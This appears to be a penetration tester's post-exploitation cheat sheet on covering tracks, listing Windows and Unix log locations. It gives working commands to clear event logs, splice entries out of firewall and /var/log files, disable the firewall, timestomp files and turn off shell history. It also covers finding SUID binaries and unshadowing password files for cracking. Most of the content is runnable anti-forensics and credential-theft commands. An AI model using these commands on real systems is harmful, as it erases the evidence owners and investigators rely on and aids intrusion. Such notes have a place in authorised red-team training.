Post Exploitation

Covering Tracks

  • Potential Windows logged locations
    • Windows Event Logs
      • System
      • Application
      • Security
    • Application Logs
      • Such as SQL error or IIS Server logs if you exploited a specific application
    • Windows Firewall Logs
    • WMI Trace Logs
    • Prefetch
    • Microsoft Error Debugger Mechanism
      • Can create a memory dump when a program crashes
      • XP: Dr. Watson
      • Vista+: Windows Error Reporting
  • Potential *Nix logged locations
    • /var/log
    • .bash_history
      • Normally does not get wrote until the shell is closed out
    • utmp, wtmp, btmp
      • Binary, cannot be edited without custom tools
    • Core debugging
      • Run “ulimit -c” to determine if it’s enabled
      • /core

Windows

Meterpreter

run event_manager -l <log> -f <event ID>
run event_manager -c <log>
run event_manager -I

Clean firewall log

run multicommand -cl "findstr \"<string>\" c:\\windows\\system32\\logfiles\\firewall\\pfirewall.log"
run multicommand -cl "cmd /c findstr /V \"<string>\" c:\\windows\\pfirewall.log > c:\\windows\\temp\\log.tmp"
ps -U <user> (Look for logon.scr to indicated screensaver is running)
run multicommand -cl "netsh firewall set opmode disable"
run multicommand -cl "cmd /c type log.tmp | find /c /v \"\"" (Get line count)
run multicommand -cl "cmd /c more log.tmp +<above result - 1>" (Get last entry)
run multicommand -cl "cmd /c move c:\\windows\\temp\\log.tmp c:\\windows\\system32\\logfiles\\firewall\\pfirewall.log"
timestomp -m "MM/DD/YYYY HH:MM:SS" c:\\windows\\system32\\logfiles\\firewall\\pfirewall.log
run multicommand -cl "netsh firewall set opmode enable"

Find crash dumps

run multicommand -cl "cmd /c dir c:\\*.*dmp /S /A"

List directory contents, oldest to newest write time

run multicommand -cl "cmd /c dir /A /od /tw"

Get logs from last 30 minutes

run multicommand -cl "cmd /c psloglist.exe -m 30 <logname> /accepteula"

*Nix

find /var/log -type f -mmin -30 2> /dev/null

Prevent shell history

unset HISTFILE

Clean plain text logs

grep -v "<string>" /var/log/<file> > /tmp/log.clean
cp /tmp/log.clean /var/log/<file> (Copying preserves permissions!)
touch -t YYYYMMDDHHMM.SS <file>
rm -rf /tmp/log.clean

Find all logs with your IP

find /var/log -type f -exec grep 'ip' /dev/null {} +

View cron jobs

for i in `find /etc/cron* -type f | cut -d":" -f 1`; do echo; echo "==========$i=========="; ls -l "$i"; cat -n "$i" 2>&1;done

Files & File System

Find all SUID files

find / -perm -4000 2>/dev/null

Password Cracking

John

unshadow passwd shadow > unshadowed.txt

Backup files

/etc/passwd-
/etc/shadow-